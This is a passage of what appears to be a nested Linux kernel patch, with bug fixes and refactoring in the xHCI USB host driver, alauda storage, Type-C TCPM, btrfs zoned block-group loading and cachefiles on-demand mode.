+ #define PCI_DEVICE_ID_EJ168		0x7023
++#define PCI_DEVICE_ID_EJ188		0x7052
+ 
+ #define PCI_DEVICE_ID_INTEL_LYNXPOINT_XHCI	0x8c31
+ #define PCI_DEVICE_ID_INTEL_LYNXPOINT_LP_XHCI	0x9c31
+@@ -275,6 +276,12 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 		xhci->quirks |= XHCI_TRUST_TX_LENGTH;
+ 		xhci->quirks |= XHCI_BROKEN_STREAMS;
+ 	}
++	if (pdev->vendor == PCI_VENDOR_ID_ETRON &&
++			pdev->device == PCI_DEVICE_ID_EJ188) {
++		xhci->quirks |= XHCI_RESET_ON_RESUME;
++		xhci->quirks |= XHCI_BROKEN_STREAMS;
++	}
++
+ 	if (pdev->vendor == PCI_VENDOR_ID_RENESAS &&
+ 	    pdev->device == 0x0014) {
+ 		xhci->quirks |= XHCI_TRUST_TX_LENGTH;
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 4a039e42694bc..7549c430c4f01 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -987,13 +987,27 @@ static int xhci_invalidate_cancelled_tds(struct xhci_virt_ep *ep)
+ 				break;
+ 			case TD_DIRTY: /* TD is cached, clear it */
+ 			case TD_HALTED:
++			case TD_CLEARING_CACHE_DEFERRED:
++				if (cached_td) {
++					if (cached_td->urb->stream_id != td->urb->stream_id) {
++						/* Multiple streams case, defer move dq */
++						xhci_dbg(xhci,
++							 "Move dq deferred: stream %u URB %p\n",
++							 td->urb->stream_id, td->urb);
++						td->cancel_status = TD_CLEARING_CACHE_DEFERRED;
++						break;
++					}
++
++					/* Should never happen, but clear the TD if it does */
++					xhci_warn(xhci,
++						  "Found multiple active URBs %p and %p in stream %u?\n",
++						  td->urb, cached_td->urb,
++						  td->urb->stream_id);
++					td_to_noop(xhci, ring, cached_td, false);
++					cached_td->cancel_status = TD_CLEARED;
++				}
++
+ 				td->cancel_status = TD_CLEARING_CACHE;
+-				if (cached_td)
+-					/* FIXME  stream case, several stopped rings */
+-					xhci_dbg(xhci,
+-						 "Move dq past stream %u URB %p instead of stream %u URB %p\n",
+-						 td->urb->stream_id, td->urb,
+-						 cached_td->urb->stream_id, cached_td->urb);
+ 				cached_td = td;
+ 				break;
+ 			}
+@@ -1013,10 +1027,16 @@ static int xhci_invalidate_cancelled_tds(struct xhci_virt_ep *ep)
+ 	if (err) {
+ 		/* Failed to move past cached td, just set cached TDs to no-op */
+ 		list_for_each_entry_safe(td, tmp_td, &ep->cancelled_td_list, cancelled_td_list) {
+-			if (td->cancel_status != TD_CLEARING_CACHE)
++			/*
++			 * Deferred TDs need to have the deq pointer set after the above command
++			 * completes, so if that failed we just give up on all of them (and
++			 * complain loudly since this could cause issues due to caching).
++			 */
++			if (td->cancel_status != TD_CLEARING_CACHE &&
++			    td->cancel_status != TD_CLEARING_CACHE_DEFERRED)
+ 				continue;
+-			xhci_dbg(xhci, "Failed to clear cancelled cached URB %p, mark clear anyway\n",
+-				 td->urb);
++			xhci_warn(xhci, "Failed to clear cancelled cached URB %p, mark clear anyway\n",
++				  td->urb);
+ 			td_to_noop(xhci, ring, td, false);
+ 			td->cancel_status = TD_CLEARED;
+ 		}
+@@ -1304,6 +1324,7 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 	struct xhci_ep_ctx *ep_ctx;
+ 	struct xhci_slot_ctx *slot_ctx;
+ 	struct xhci_td *td, *tmp_td;
++	bool deferred = false;
+ 
+ 	ep_index = TRB_TO_EP_INDEX(le32_to_cpu(trb->generic.field[3]));
+ 	stream_id = TRB_TO_STREAM_ID(le32_to_cpu(trb->generic.field[2]));
+@@ -1390,6 +1411,8 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 			xhci_dbg(ep->xhci, "%s: Giveback cancelled URB %p TD\n",
+ 				 __func__, td->urb);
+ 			xhci_td_cleanup(ep->xhci, td, ep_ring, td->status);
++		} else if (td->cancel_status == TD_CLEARING_CACHE_DEFERRED) {
++			deferred = true;
+ 		} else {
+ 			xhci_dbg(ep->xhci, "%s: Keep cancelled URB %p TD as cancel_status is %d\n",
+ 				 __func__, td->urb, td->cancel_status);
+@@ -1399,8 +1422,17 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 	ep->ep_state &= ~SET_DEQ_PENDING;
+ 	ep->queued_deq_seg = NULL;
+ 	ep->queued_deq_ptr = NULL;
+-	/* Restart any rings with pending URBs */
+-	ring_doorbell_for_active_rings(xhci, slot_id, ep_index);
++
++	if (deferred) {
++		/* We have more streams to clear */
++		xhci_dbg(ep->xhci, "%s: Pending TDs to clear, continuing with invalidation\n",
++			 __func__);
++		xhci_invalidate_cancelled_tds(ep);
++	} else {
++		/* Restart any rings with pending URBs */
++		xhci_dbg(ep->xhci, "%s: All TDs cleared, ring doorbell\n", __func__);
++		ring_doorbell_for_active_rings(xhci, slot_id, ep_index);
++	}
+ }
+ 
+ static void xhci_handle_cmd_reset_ep(struct xhci_hcd *xhci, int slot_id,
+@@ -2506,9 +2538,8 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		goto finish_td;
+ 	case COMP_STOPPED_LENGTH_INVALID:
+ 		/* stopped on ep trb with invalid length, exclude it */
+-		ep_trb_len	= 0;
+-		remaining	= 0;
+-		break;
++		td->urb->actual_length = sum_trb_lengths(xhci, ep_ring, ep_trb);
++		goto finish_td;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		if (xhci->quirks & XHCI_NO_SOFT_RETRY ||
+ 		    (ep->err_count++ > MAX_SOFT_RETRY) ||
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index fa9e87141e0bf..c42058bfcd160 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1556,6 +1556,7 @@ enum xhci_cancelled_td_status {
+ 	TD_DIRTY = 0,
+ 	TD_HALTED,
+ 	TD_CLEARING_CACHE,
++	TD_CLEARING_CACHE_DEFERRED,
+ 	TD_CLEARED,
+ };
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 115f05a6201a1..40d34cc28344a 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -105,6 +105,8 @@ struct alauda_info {
+ 	unsigned char sense_key;
+ 	unsigned long sense_asc;	/* additional sense code */
+ 	unsigned long sense_ascq;	/* additional sense code qualifier */
++
++	bool media_initialized;
+ };
+ 
+ #define short_pack(lsb,msb) ( ((u16)(lsb)) | ( ((u16)(msb))<<8 ) )
+@@ -476,11 +478,12 @@ static int alauda_check_media(struct us_data *us)
+ 	}
+ 
+ 	/* Check for media change */
+-	if (status[0] & 0x08) {
++	if (status[0] & 0x08 || !info->media_initialized) {
+ 		usb_stor_dbg(us, "Media change detected\n");
+ 		alauda_free_maps(&MEDIA_INFO(us));
+-		alauda_init_media(us);
+-
++		rc = alauda_init_media(us);
++		if (rc == USB_STOR_TRANSPORT_GOOD)
++			info->media_initialized = true;
+ 		info->sense_key = UNIT_ATTENTION;
+ 		info->sense_asc = 0x28;
+ 		info->sense_ascq = 0x00;
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bbcc0e0aa070a..bb77f646366a5 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2430,8 +2430,10 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
+-	if (cap)
++	if (cap) {
+ 		usb_power_delivery_unregister_capabilities(cap);
++		port->partner_source_caps = NULL;
++	}
+ 
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+@@ -5446,6 +5448,7 @@ static void _tcpm_pd_hard_reset(struct tcpm_port *port)
+ 		port->tcpc->set_bist_data(port->tcpc, false);
+ 
+ 	switch (port->state) {
++	case TOGGLING:
+ 	case ERROR_RECOVERY:
+ 	case PORT_RESET:
+ 	case PORT_RESET_WAIT_OFF:
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 5756edb37c61e..c17232659942d 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -51,15 +51,6 @@
+ 				 BTRFS_SUPER_FLAG_METADUMP |\
+ 				 BTRFS_SUPER_FLAG_METADUMP_V2)
+ 
+-static void btrfs_destroy_ordered_extents(struct btrfs_root *root);
+-static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+-				      struct btrfs_fs_info *fs_info);
+-static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root);
+-static int btrfs_destroy_marked_extents(struct btrfs_fs_info *fs_info,
+-					struct extent_io_tree *dirty_pages,
+-					int mark);
+-static int btrfs_destroy_pinned_extent(struct btrfs_fs_info *fs_info,
+-				       struct extent_io_tree *pinned_extents);
+ static int btrfs_cleanup_transaction(struct btrfs_fs_info *fs_info);
+ static void btrfs_error_commit_super(struct btrfs_fs_info *fs_info);
+ 
+@@ -4948,23 +4939,14 @@ static void btrfs_destroy_all_ordered_extents(struct btrfs_fs_info *fs_info)
+ 	btrfs_wait_ordered_roots(fs_info, U64_MAX, 0, (u64)-1);
+ }
+ 
+-static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+-				      struct btrfs_fs_info *fs_info)
++static void btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
++				       struct btrfs_fs_info *fs_info)
+ {
+ 	struct rb_node *node;
+-	struct btrfs_delayed_ref_root *delayed_refs;
++	struct btrfs_delayed_ref_root *delayed_refs = &trans->delayed_refs;
+ 	struct btrfs_delayed_ref_node *ref;
+-	int ret = 0;
+-
+-	delayed_refs = &trans->delayed_refs;
+ 
+ 	spin_lock(&delayed_refs->lock);
+-	if (atomic_read(&delayed_refs->num_entries) == 0) {
+-		spin_unlock(&delayed_refs->lock);
+-		btrfs_debug(fs_info, "delayed_refs has NO entry");
+-		return ret;
+-	}
+-
+ 	while ((node = rb_first_cached(&delayed_refs->href_root)) != NULL) {
+ 		struct btrfs_delayed_ref_head *head;
+ 		struct rb_node *n;
+@@ -5024,8 +5006,6 @@ static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+ 	btrfs_qgroup_destroy_extent_records(trans);
+ 
+ 	spin_unlock(&delayed_refs->lock);
+-
+-	return ret;
+ }
+ 
+ static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root)
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 56d7580fdc3c4..3518e638374ea 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -867,7 +867,7 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 					split->block_len = em->block_len;
+ 					split->orig_start = em->orig_start;
+ 				} else {
+-					const u64 diff = start + len - em->start;
++					const u64 diff = end - em->start;
+ 
+ 					split->block_len = split->len;
+ 					split->block_start += diff;
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 99cb690da9893..2c42e85a3e269 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1270,21 +1270,175 @@ static int calculate_alloc_pointer(struct btrfs_block_group *cache,
+ 	return ret;
+ }
+ 
++struct zone_info {
++	u64 physical;
++	u64 capacity;
++	u64 alloc_offset;
++};
++
++static int btrfs_load_zone_info(struct btrfs_fs_info *fs_info, int zone_idx,
++				struct zone_info *info, unsigned long *active,
++				struct map_lookup *map)
++{
++	struct btrfs_dev_replace *dev_replace = &fs_info->dev_replace;
++	struct btrfs_device *device;
++	int dev_replace_is_ongoing = 0;
++	unsigned int nofs_flag;
++	struct blk_zone zone;
++	int ret;
++
++	info->physical = map->stripes[zone_idx].physical;
++
++	down_read(&dev_replace->rwsem);
++	device = map->stripes[zone_idx].dev;
++
++	if (!device->bdev) {
++		up_read(&dev_replace->rwsem);
++		info->alloc_offset = WP_MISSING_DEV;
++		return 0;
++	}
++
++	/* Consider a zone as active if we can allow any number of active zones. */
++	if (!device->zone_info->max_active_zones)
++		__set_bit(zone_idx, active);
++
++	if (!btrfs_dev_is_sequential(device, info->physical)) {
++		up_read(&dev_replace->rwsem);
++		info->alloc_offset = WP_CONVENTIONAL;
++		return 0;
++	}
++
++	/* This zone will be used for allocation, so mark this zone non-empty. */
++	btrfs_dev_clear_zone_empty(device, info->physical);
++
++	dev_replace_is_ongoing = btrfs_dev_replace_is_ongoing(dev_replace);
++	if (dev_replace_is_ongoing && dev_replace->tgtdev != NULL)
++		btrfs_dev_clear_zone_empty(dev_replace->tgtdev, info->physical);
++
++	/*
++	 * The group is mapped to a sequential zone. Get the zone write pointer
++	 * to determine the allocation offset within the zone.
++	 */
++	WARN_ON(!IS_ALIGNED(info->physical, fs_info->zone_size));
++	nofs_flag = memalloc_nofs_save();
++	ret = btrfs_get_dev_zone(device, info->physical, &zone);
++	memalloc_nofs_restore(nofs_flag);
++	if (ret) {
++		up_read(&dev_replace->rwsem);
++		if (ret != -EIO && ret != -EOPNOTSUPP)
++			return ret;
++		info->alloc_offset = WP_MISSING_DEV;
++		return 0;
++	}
++
++	if (zone.type == BLK_ZONE_TYPE_CONVENTIONAL) {
++		btrfs_err_in_rcu(fs_info,
++		"zoned: unexpected conventional zone %llu on device %s (devid %llu)",
++			zone.start << SECTOR_SHIFT, rcu_str_deref(device->name),
++			device->devid);
++		up_read(&dev_replace->rwsem);
++		return -EIO;
++	}
++
++	info->capacity = (zone.capacity << SECTOR_SHIFT);
++
++	switch (zone.cond) {
++	case BLK_ZONE_COND_OFFLINE:
++	case BLK_ZONE_COND_READONLY:
++		btrfs_err(fs_info,
++		"zoned: offline/readonly zone %llu on device %s (devid %llu)",
++			  (info->physical >> device->zone_info->zone_size_shift),
++			  rcu_str_deref(device->name), device->devid);
++		info->alloc_offset = WP_MISSING_DEV;
++		break;
++	case BLK_ZONE_COND_EMPTY:
++		info->alloc_offset = 0;
++		break;
++	case BLK_ZONE_COND_FULL:
++		info->alloc_offset = info->capacity;
++		break;
++	default:
++		/* Partially used zone. */
++		info->alloc_offset = ((zone.wp - zone.start) << SECTOR_SHIFT);
++		__set_bit(zone_idx, active);
++		break;
++	}
++
++	up_read(&dev_replace->rwsem);
++
++	return 0;
++}
++
++static int btrfs_load_block_group_single(struct btrfs_block_group *bg,
++					 struct zone_info *info,
++					 unsigned long *active)
++{
++	if (info->alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			"zoned: cannot recover write pointer for zone %llu",
++			info->physical);
++		return -EIO;
++	}
++
++	bg->alloc_offset = info->alloc_offset;
++	bg->zone_capacity = info->capacity;
++	if (test_bit(0, active))
++		set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &bg->runtime_flags);
++	return 0;
++}
++
++static int btrfs_load_block_group_dup(struct btrfs_block_group *bg,
++				      struct map_lookup *map,
++				      struct zone_info *zone_info,
++				      unsigned long *active)
++{
++	if (map->type & BTRFS_BLOCK_GROUP_DATA) {
++		btrfs_err(bg->fs_info,
++			  "zoned: profile DUP not yet supported on data bg");
++		return -EINVAL;
++	}
++
++	if (zone_info[0].alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			  "zoned: cannot recover write pointer for zone %llu",
++			  zone_info[0].physical);
++		return -EIO;
++	}
++	if (zone_info[1].alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			  "zoned: cannot recover write pointer for zone %llu",
++			  zone_info[1].physical);
++		return -EIO;
++	}
++	if (zone_info[0].alloc_offset != zone_info[1].alloc_offset) {
++		btrfs_err(bg->fs_info,
++			  "zoned: write pointer offset mismatch of zones in DUP profile");
++		return -EIO;
++	}
++
++	if (test_bit(0, active) != test_bit(1, active)) {
++		if (!btrfs_zone_activate(bg))
++			return -EIO;
++	} else if (test_bit(0, active)) {
++		set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &bg->runtime_flags);
++	}
++
++	bg->alloc_offset = zone_info[0].alloc_offset;
++	bg->zone_capacity = min(zone_info[0].capacity, zone_info[1].capacity);
++	return 0;
++}
++
+ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ {
+ 	struct btrfs_fs_info *fs_info = cache->fs_info;
+ 	struct extent_map_tree *em_tree = &fs_info->mapping_tree;
+ 	struct extent_map *em;
+ 	struct map_lookup *map;
+-	struct btrfs_device *device;
+ 	u64 logical = cache->start;
+ 	u64 length = cache->length;
++	struct zone_info *zone_info = NULL;
+ 	int ret;
+ 	int i;
+-	unsigned int nofs_flag;
+-	u64 *alloc_offsets = NULL;
+-	u64 *caps = NULL;
+-	u64 *physical = NULL;
+ 	unsigned long *active = NULL;
+ 	u64 last_alloc = 0;
+ 	u32 num_sequential = 0, num_conventional = 0;
+@@ -1316,20 +1470,8 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 		goto out;
+ 	}
+ 
+-	alloc_offsets = kcalloc(map->num_stripes, sizeof(*alloc_offsets), GFP_NOFS);
+-	if (!alloc_offsets) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	caps = kcalloc(map->num_stripes, sizeof(*caps), GFP_NOFS);
+-	if (!caps) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	physical = kcalloc(map->num_stripes, sizeof(*physical), GFP_NOFS);
+-	if (!physical) {
++	zone_info = kcalloc(map->num_stripes, sizeof(*zone_info), GFP_NOFS);
++	if (!zone_info) {
+ 		ret = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -1341,98 +1483,14 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 	}
+ 
+ 	for (i = 0; i < map->num_stripes; i++) {
+-		bool is_sequential;
+-		struct blk_zone zone;
+-		struct btrfs_dev_replace *dev_replace = &fs_info->dev_replace;
+-		int dev_replace_is_ongoing = 0;
+-
+-		device = map->stripes[i].dev;
+-		physical[i] = map->stripes[i].physical;
+-
+-		if (device->bdev == NULL) {
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			continue;
+-		}
+-
+-		is_sequential = btrfs_dev_is_sequential(device, physical[i]);
+-		if (is_sequential)
+-			num_sequential++;
+-		else
+-			num_conventional++;
+-
+-		/*
+-		 * Consider a zone as active if we can allow any number of
+-		 * active zones.
+-		 */
+-		if (!device->zone_info->max_active_zones)
+-			__set_bit(i, active);
+-
+-		if (!is_sequential) {
+-			alloc_offsets[i] = WP_CONVENTIONAL;
+-			continue;
+-		}
+-
+-		/*
+-		 * This zone will be used for allocation, so mark this zone
+-		 * non-empty.
+-		 */
+-		btrfs_dev_clear_zone_empty(device, physical[i]);
+-
+-		down_read(&dev_replace->rwsem);
+-		dev_replace_is_ongoing = btrfs_dev_replace_is_ongoing(dev_replace);
+-		if (dev_replace_is_ongoing && dev_replace->tgtdev != NULL)
+-			btrfs_dev_clear_zone_empty(dev_replace->tgtdev, physical[i]);
+-		up_read(&dev_replace->rwsem);
+-
+-		/*
+-		 * The group is mapped to a sequential zone. Get the zone write
+-		 * pointer to determine the allocation offset within the zone.
+-		 */
+-		WARN_ON(!IS_ALIGNED(physical[i], fs_info->zone_size));
+-		nofs_flag = memalloc_nofs_save();
+-		ret = btrfs_get_dev_zone(device, physical[i], &zone);
+-		memalloc_nofs_restore(nofs_flag);
+-		if (ret == -EIO || ret == -EOPNOTSUPP) {
+-			ret = 0;
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			continue;
+-		} else if (ret) {
+-			goto out;
+-		}
+-
+-		if (zone.type == BLK_ZONE_TYPE_CONVENTIONAL) {
+-			btrfs_err_in_rcu(fs_info,
+-	"zoned: unexpected conventional zone %llu on device %s (devid %llu)",
+-				zone.start << SECTOR_SHIFT,
+-				rcu_str_deref(device->name), device->devid);
+-			ret = -EIO;
++		ret = btrfs_load_zone_info(fs_info, i, &zone_info[i], active, map);
++		if (ret)
+ 			goto out;
+-		}
+-
+-		caps[i] = (zone.capacity << SECTOR_SHIFT);
+ 
+-		switch (zone.cond) {
+-		case BLK_ZONE_COND_OFFLINE:
+-		case BLK_ZONE_COND_READONLY:
+-			btrfs_err(fs_info,
+-		"zoned: offline/readonly zone %llu on device %s (devid %llu)",
+-				  physical[i] >> device->zone_info->zone_size_shift,
+-				  rcu_str_deref(device->name), device->devid);
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			break;
+-		case BLK_ZONE_COND_EMPTY:
+-			alloc_offsets[i] = 0;
+-			break;
+-		case BLK_ZONE_COND_FULL:
+-			alloc_offsets[i] = caps[i];
+-			break;
+-		default:
+-			/* Partially used zone */
+-			alloc_offsets[i] =
+-					((zone.wp - zone.start) << SECTOR_SHIFT);
+-			__set_bit(i, active);
+-			break;
+-		}
++		if (zone_info[i].alloc_offset == WP_CONVENTIONAL)
++			num_conventional++;
++		else
++			num_sequential++;
+ 	}
+ 
+ 	if (num_sequential > 0)
+@@ -1456,56 +1514,10 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 
+ 	switch (map->type & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
+ 	case 0: /* single */
+-		if (alloc_offsets[0] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[0]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		cache->alloc_offset = alloc_offsets[0];
+-		cache->zone_capacity = caps[0];
+-		if (test_bit(0, active))
+-			set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags);
++		ret = btrfs_load_block_group_single(cache, &zone_info[0], active);
+ 		break;
+ 	case BTRFS_BLOCK_GROUP_DUP:
+-		if (map->type & BTRFS_BLOCK_GROUP_DATA) {
+-			btrfs_err(fs_info, "zoned: profile DUP not yet supported on data bg");
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-		if (alloc_offsets[0] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[0]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (alloc_offsets[1] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[1]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (alloc_offsets[0] != alloc_offsets[1]) {
+-			btrfs_err(fs_info,
+-			"zoned: write pointer offset mismatch of zones in DUP profile");
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (test_bit(0, active) != test_bit(1, active)) {
+-			if (!btrfs_zone_activate(cache)) {
+-				ret = -EIO;
+-				goto out;
+-			}
+-		} else {
+-			if (test_bit(0, active))
+-				set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+-					&cache->runtime_flags);
+-		}
+-		cache->alloc_offset = alloc_offsets[0];
+-		cache->zone_capacity = min(caps[0], caps[1]);
++		ret = btrfs_load_block_group_dup(cache, map, zone_info, active);
+ 		break;
+ 	case BTRFS_BLOCK_GROUP_RAID1:
+ 	case BTRFS_BLOCK_GROUP_RAID0:
+@@ -1558,9 +1570,7 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 		cache->physical_map = NULL;
+ 	}
+ 	bitmap_free(active);
+-	kfree(physical);
+-	kfree(caps);
+-	kfree(alloc_offsets);
++	kfree(zone_info);
+ 	free_extent_map(em);
+ 
+ 	return ret;
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index 5f4df9588620f..b9945e4f697be 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -77,6 +77,7 @@ static const struct cachefiles_daemon_cmd cachefiles_daemon_cmds[] = {
+ 	{ "tag",	cachefiles_daemon_tag		},
+ #ifdef CONFIG_CACHEFILES_ONDEMAND
+ 	{ "copen",	cachefiles_ondemand_copen	},
++	{ "restore",	cachefiles_ondemand_restore	},
+ #endif
+ 	{ "",		NULL				}
+ };
+@@ -132,7 +133,7 @@ static int cachefiles_daemon_open(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static void cachefiles_flush_reqs(struct cachefiles_cache *cache)
++void cachefiles_flush_reqs(struct cachefiles_cache *cache)
+ {
+ 	struct xarray *xa = &cache->reqs;
+ 	struct cachefiles_req *req;
+@@ -158,6 +159,7 @@ static void cachefiles_flush_reqs(struct cachefiles_cache *cache)
+ 	xa_for_each(xa, index, req) {
+ 		req->error = -EIO;
+ 		complete(&req->done);
++		__xa_erase(xa, index);
+ 	}
+ 	xa_unlock(xa);
+ 
+diff --git a/fs/cachefiles/interface.c b/fs/cachefiles/interface.c
+index a69073a1d3f06..bde23e156a63c 100644
+--- a/fs/cachefiles/interface.c
++++ b/fs/cachefiles/interface.c
+@@ -31,6 +31,11 @@ struct cachefiles_object *cachefiles_alloc_object(struct fscache_cookie *cookie)
+ 	if (!object)
+ 		return NULL;
+ 
++	if (cachefiles_ondemand_init_obj_info(object, volume)) {
++		kmem_cache_free(cachefiles_object_jar, object);
++		return NULL;
++	}
++
+ 	refcount_set(&object->ref, 1);
+ 
+ 	spin_lock_init(&object->lock);
+@@ -88,7 +93,7 @@ void cachefiles_put_object(struct cachefiles_object *object,
+ 		ASSERTCMP(object->file, ==, NULL);
+ 
+ 		kfree(object->d_name);
+-
++		cachefiles_ondemand_deinit_obj_info(object);
+ 		cache = object->volume->cache->cache;
+ 		fscache_put_cookie(object->cookie, fscache_cookie_put_object);
+ 		object->cookie = NULL;
+diff --git a/fs/cachefiles/internal.h b/fs/cachefiles/internal.h
+index 2ad58c4652084..3eea52462fc87 100644
+--- a/fs/cachefiles/internal.h
++++ b/fs/cachefiles/internal.h
+@@ -44,6 +44,20 @@ struct cachefiles_volume {
+ 	struct dentry			*fanout[256];	/* Fanout subdirs */
+ };
+ 
++enum cachefiles_object_state {
++	CACHEFILES_ONDEMAND_OBJSTATE_CLOSE, /* Anonymous fd closed by daemon or initial state */
++	CACHEFILES_ONDEMAND_OBJSTATE_OPEN, /* Anonymous fd associated with object is available */
++	CACHEFILES_ONDEMAND_OBJSTATE_REOPENING, /* Object that was closed and is being reopened. */
++};
++
++struct cachefiles_ondemand_info {
++	struct work_struct		ondemand_work;
++	int				ondemand_id;
++	enum cachefiles_object_state	state;
++	struct cachefiles_object	*object;
++	spinlock_t			lock;
++};
++
+ /*
+  * Backing file state.
+  */
+@@ -61,7 +75,7 @@ struct cachefiles_object {
+ 	unsigned long			flags;
+ #define CACHEFILES_OBJECT_USING_TMPFILE	0		/* Have an unlinked tmpfile */
+ #ifdef CONFIG_CACHEFILES_ONDEMAND
+-	int				ondemand_id;
++	struct cachefiles_ondemand_info	*ondemand;
+ #endif
+ };
+ 
+@@ -125,6 +139,7 @@ static inline bool cachefiles_in_ondemand_mode(struct cachefiles_cache *cache)
+ struct cachefiles_req {
+ 	struct cachefiles_object *object;
+ 	struct completion done;
++	refcount_t ref;
+ 	int error;
+ 	struct cachefiles_msg msg;
+ };
+@@ -173,6 +188,7 @@ extern int cachefiles_has_space(struct cachefiles_cache *cache,
+  * daemon.c
+  */
+ extern const struct file_operations cachefiles_daemon_fops;
++extern void cachefiles_flush_reqs(struct cachefiles_cache *cache);
+ extern void cachefiles_get_unbind_pincount(struct cachefiles_cache *cache);
+ extern void cachefiles_put_unbind_pincount(struct cachefiles_cache *cache);
+ 
+@@ -290,12 +306,35 @@ extern ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ extern int cachefiles_ondemand_copen(struct cachefiles_cache *cache,
+ 				     char *args);
+ 
++extern int cachefiles_ondemand_restore(struct cachefiles_cache *cache,
++					char *args);
++
+ extern int cachefiles_ondemand_init_object(struct cachefiles_object *object);
+ extern void cachefiles_ondemand_clean_object(struct cachefiles_object *object);
+ 
+ extern int cachefiles_ondemand_read(struct cachefiles_object *object,
+ 				    loff_t pos, size_t len);
+ 
++extern int cachefiles_ondemand_init_obj_info(struct cachefiles_object *obj,
++					struct cachefiles_volume *volume);
++extern void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj);
++
++#define CACHEFILES_OBJECT_STATE_FUNCS(_state, _STATE)	\
++static inline bool								\
++cachefiles_ondemand_object_is_##_state(const struct cachefiles_object *object) \
++{												\
++	return object->ondemand->state == CACHEFILES_ONDEMAND_OBJSTATE_##_STATE; \
++}												\
++												\
++static inline void								\
++cachefiles_ondemand_set_object_##_state(struct cachefiles_object *object) \
++{												\
++	object->ondemand->state = CACHEFILES_ONDEMAND_OBJSTATE_##_STATE; \
++}
++
++CACHEFILES_OBJECT_STATE_FUNCS(open, OPEN);
++CACHEFILES_OBJECT_STATE_FUNCS(close, CLOSE);
++CACHEFILES_OBJECT_STATE_FUNCS(reopening, REOPENING);
+ #else
+ static inline ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+@@ -317,6 +356,15 @@ static inline int cachefiles_ondemand_read(struct cachefiles_object *object,
+ {
+ 	return -EOPNOTSUPP;
+ }
++
++static inline int cachefiles_ondemand_init_obj_info(struct cachefiles_object *obj,
++						struct cachefiles_volume *volume)
++{
++	return 0;
++}
